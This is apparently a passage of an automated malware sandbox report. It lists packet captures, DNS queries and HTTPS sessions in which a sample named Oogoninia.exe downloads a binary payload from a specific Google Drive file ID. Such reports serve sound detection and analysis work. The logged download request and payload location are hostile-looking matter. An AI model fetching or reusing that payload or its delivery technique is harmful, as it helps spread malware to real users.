                                                                                                                                                                                  Oct 8, 2024 21:52:10.673032045 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.675364971 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.675592899 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.675672054 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.675955057 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.678066969 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.678297043 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.678354979 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.678594112 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.680629015 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.680846930 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.680890083 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.681083918 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.683288097 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.683635950 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.683695078 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.683932066 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.685854912 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.686093092 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.686156988 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.686419010 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.688993931 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.689157963 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.689209938 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.689496040 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.692240000 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.692420959 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.692475080 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.692734003 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.695463896 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.695741892 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.695802927 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.696088076 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.696238995 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.696445942 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.696508884 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.696747065 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.698693037 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.698987961 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.699043989 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.699379921 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.701129913 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.701291084 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.701344967 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.701625109 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.703794956 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.703988075 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.704025984 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.704211950 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.705981970 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.706705093 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.706732988 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.707048893 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.708170891 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.708348036 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.708388090 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.708626986 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.710603952 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.710813999 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.710850954 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.711071014 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.713212013 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.713373899 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.713403940 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.713591099 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.722466946 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.722632885 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.722637892 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.722676039 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.722851038 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.722898960 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.722913980 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.723189116 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.723932981 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.724190950 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.724231005 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.724380970 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.726232052 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.726458073 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.726496935 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.726703882 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.728811026 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.729721069 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.729749918 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.729975939 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.730319977 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.730468988 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.730494022 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.730808973 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.732470989 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.732635975 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.732664108 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.732953072 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.734030962 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.734242916 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.734271049 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.734443903 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.736007929 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.736236095 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.736255884 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.736396074 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.737938881 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.738169909 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.738193035 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.738425970 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.740803957 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.741036892 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.741072893 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.741303921 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.747149944 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.747332096 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.747400045 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.747419119 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.747461081 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.747570992 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.747603893 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.747741938 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.747792006 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.747972965 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.748114109 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.752844095 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.753009081 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.753030062 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.753086090 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.753232956 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.753248930 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.753400087 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.753437996 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.753463030 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.753647089 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.753695965 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.753851891 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.753875971 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.754231930 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.755419016 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.755611897 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.755649090 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.755882025 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.757006884 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.757217884 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.757253885 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.757558107 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.759105921 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.759311914 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.759351015 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.759579897 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.760185957 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.760409117 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.760445118 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.760759115 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.761851072 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.762082100 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.762118101 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.762347937 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.763374090 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.763592958 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.763629913 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.763843060 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.764919043 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.765152931 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.765188932 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.765419006 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.766383886 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.766616106 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.766650915 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.766911030 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.767961025 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.768151045 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.768191099 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.768408060 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.769427061 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.769658089 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.769694090 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.769922972 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.773998976 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.774202108 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.774249077 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.774271965 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.774483919 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.774485111 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.783802032 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784013987 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784054041 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784096003 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784262896 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784322023 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784504890 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784518003 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784598112 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784703016 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784738064 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784811974 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784903049 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784915924 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784955025 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.785094023 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.785094976 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.785094976 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.785157919 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.785366058 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.785382986 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.785641909 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.785641909 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:11.094909906 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:11.094980955 CEST44349706142.251.40.129192.168.11.20

                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Oct 8, 2024 21:52:06.825788975 CEST6163653192.168.11.201.1.1.1
                                                                                                                                                                                  Oct 8, 2024 21:52:06.921607018 CEST53616361.1.1.1192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:07.450614929 CEST5215753192.168.11.201.1.1.1
                                                                                                                                                                                  Oct 8, 2024 21:52:07.546505928 CEST53521571.1.1.1192.168.11.20

                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                  Oct 8, 2024 21:52:06.825788975 CEST192.168.11.201.1.1.10xc2c9Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 8, 2024 21:52:07.450614929 CEST192.168.11.201.1.1.10xbc75Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                  Oct 8, 2024 21:52:06.921607018 CEST1.1.1.1192.168.11.200xc2c9No error (0)drive.google.com142.250.80.78A (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 8, 2024 21:52:07.546505928 CEST1.1.1.1192.168.11.200xbc75No error (0)drive.usercontent.google.com142.251.40.129A (IP address)IN (0x0001)false

                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                  • drive.google.com
                                                                                                                                                                                  • drive.usercontent.google.com

                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  0192.168.11.2049705142.250.80.784439000C:\Users\user\Desktop\Oogoninia.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-10-08 19:52:07 UTC216OUTGET /uc?export=download&id=1ebPjn97g6Md1czlcx8nGPFrA4sVz_tMd HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                                                                                  Host: drive.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2024-10-08 19:52:07 UTC1610INHTTP/1.1 303 See Other
                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Tue, 08 Oct 2024 19:52:07 GMT
                                                                                                                                                                                  Location: https://drive.usercontent.google.com/download?id=1ebPjn97g6Md1czlcx8nGPFrA4sVz_tMd&export=download
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Content-Security-Policy: script-src 'nonce-__fYEZbpbPp0N46bfXnIGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                  Connection: close


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  1192.168.11.2049706142.251.40.1294439000C:\Users\user\Desktop\Oogoninia.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-10-08 19:52:07 UTC258OUTGET /download?id=1ebPjn97g6Md1czlcx8nGPFrA4sVz_tMd&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Host: drive.usercontent.google.com
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-10-08 19:52:10 UTC4895INHTTP/1.1 200 OK
                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                                                                                  Content-Security-Policy: default-src 'none'
                                                                                                                                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Content-Disposition: attachment; filename="vpePiwNT121.bin"
                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Content-Length: 288832
                                                                                                                                                                                  Last-Modified: Tue, 08 Oct 2024 07:01:06 GMT
                                                                                                                                                                                  X-GUploader-UploadID: AHmUCY0W7mnjixSXaJHun9aqQyakiYflmTHcZ5bv0xMoHozrfJGcMSwQjFJs97scslallb_3XnHBCfnHrQ
                                                                                                                                                                                  Date: Tue, 08 Oct 2024 19:52:10 GMT
                                                                                                                                                                                  Expires: Tue, 08 Oct 2024 19:52:10 GMT
                                                                                                                                                                                  Cache-Control: private, max-age=0
                                                                                                                                                                                  X-Goog-Hash: crc32c=xAUmxQ==
                                                                                                                                                                                  Server: UploadServer
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                  Connection: close
